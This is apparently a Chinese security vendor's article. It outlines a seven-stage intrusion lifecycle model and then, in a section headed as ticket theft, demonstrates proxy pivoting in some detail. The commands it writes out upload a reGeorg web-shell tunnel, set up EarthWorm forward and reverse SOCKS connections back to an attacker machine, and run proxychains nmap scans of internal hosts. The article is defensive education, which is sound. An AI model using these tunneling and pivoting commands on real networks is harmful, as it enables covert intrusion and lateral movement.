美創科技為了更好地進行入侵檢測和防御，參照各種安全威脅框架和自身的實踐與思考，提出了基于入侵生命周期的攻擊管理模型，作為美創新一代安全架構的三大支柱之一。

入侵生命周期v1.0把入侵過程劃分為7個階段：探索發現、入侵和感染、探索感知、傳播、持久化、攻擊和利用、恢復。入侵生命周期v1.0同樣以ATT&CK作為基本戰術知識庫，匹配到不同的入侵階段。需要注意的是，并非所有的入侵都會經歷這7個階段，也沒有絕對的線性次序。

1）探索發現在這個階段中，攻擊者會先鎖定攻擊對象，然后利用某些技術手段，盡可能多地獲取目標暴露出來的信息，如通過端口掃描、指紋探測等方式，發現敏感端口及版本信息，進而尋找攻擊點，為下一步入侵做準備。

2）入侵和感染在這個階段，攻擊者會根據“探索發現”階段所發現的重要信息，來對目標暴露出的攻擊面進行攻擊嘗試，在“探索發現”階段收集到的信息越多，攻擊對象所暴露的攻擊面也就越多，攻擊更易成功。

3）探索感知攻擊者在成功進入系統內部后，由于是首次進入所以會出現對內部環境不熟悉的情況，這時攻擊者的動作一般會是對當前所處環境進行探索，摸清內部大致的網絡結構，常常伴隨著被入侵本機的敏感信息收集以及對內網大量的端口進行掃描，后續根據攻擊者的目的進行下一步操作。

4）傳播在此階段，攻擊者根據上一階段在內網探索感知收集到的信息，選擇特定的攻擊手法。如若發現內部是域環境，攻擊者可能會嘗試先攻破域控服務器，再傳播其他機器。若是工作組環境，可能會利用收集到的端口和服務信息，選擇特定漏洞進行批量掃描攻擊，來盡可能多地繼續獲得其他計算機的控制權。

5）持久化攻擊者在對資產進行惡意操作后，為了能夠減少再次連接的攻擊成本，方便下次進入，會進行“留后門”的操作，常見的后門如：建立計劃任務，定時連接遠程服務器；設置開機啟動程序，在每次開機時觸發執行特定惡意程序；新建系統管理員賬號等。這樣便于攻擊者下次快速登錄并控制該系統。

6）攻擊和利用攻擊者在此階段便會開始對目標資產進行惡意操作，按照攻擊者意愿，對能利用的數據進行竊取、利用；對操作系統、敏感文件進行破壞、刪除。所有的防御手段都應該極力阻止攻擊者進行到這一階段。

7）恢復攻擊者在執行所有的攻擊操作時，往往會在系統上留下大量的行為日志，因此在這一階段，攻擊者會對記錄自身痕跡的所有日志進行處理，或刪除或混淆，從而消滅證據，逃避追蹤。

本系列文章基于美創科技入侵生命周期1.0架構，細分各階段攻擊者的常用攻擊手段，并對相關攻擊手段的具體實施方式進行逐一剖析，為安全防御建設提供有力知識補充和反制準備。

票據竊取攻擊（傳播）

攻擊者可以使用連接代理來引導系統之間的網絡流量，或者充當與命令和控制服務器進行網絡通信的中介，以避免直接連接到其基礎結構。存在許多啟用代理或端口重定向的流量重定向的工具，包括HTRAN，ZXProxy和ZXPortMap。攻擊者使用這些類型的代理來管理命令和控制通信，減少同時出站網絡連接的數量，在連接斷開時提供彈性或在受害者之間越過現有的受信任通信路徑以避免懷疑。對手可能會將多個代理鏈接在一起，以進一步掩蓋惡意流量的來源。對手還可以利用內容分發網絡（CDN）中的路由方案來代理命令和控制流量。

在搭建惡意軟件代理的行為中，涉及到的輸入輸出如下：

輸入：被攻破的機器IP、端口、想執行的命令、代理工具

輸出：命令執行成功后的結果

目前，利用代理手段進行網絡流量的中繼，具有很多種方式，這里我用兩種方式演示下相關代理流程

1. regreorgSocksProxy結合proxychains來演示流量代理的過程

將regeorg代理腳本傳至被代理服務器，根據腳本類型選擇php,jsp,asp等，上傳完成之后，訪問

運行python程序

即將本地的9999端口流量通過regeory代理到內網Proxychains配置本地代理一般配置文件在/etc/proxychains.confdynamic_chain 前注釋去掉

socks5 127.0.0.1 9999 最后添加該代理配置

執行代理

2. earthworm 結合proxychains進行正向代理

被代理機器(192.168.160.251)開啟監聽

ew_for_win.exe -s ssocksd -l 1234

在攻擊機配置proxychain.conf代理

socks5 192.168.160.251 1234

使用proxychains代理掃描內網

proxychains5 nmap 10.10.10.10 -p 445

3. earthworm 結合proxychains進行反向代理

攻擊機開啟監聽ew_for_MacOSX64 -s rcsocks -l 1234 -e 4399

開啟監聽，并將進入4399端口的流量轉發到1234

代理機器反向連接ew_for_Win.exe -s rssocks -d 192.168.97.208 -e 4399

配置proxychainssocks5127.0.0.1 1234

Proxychains進行nmap掃描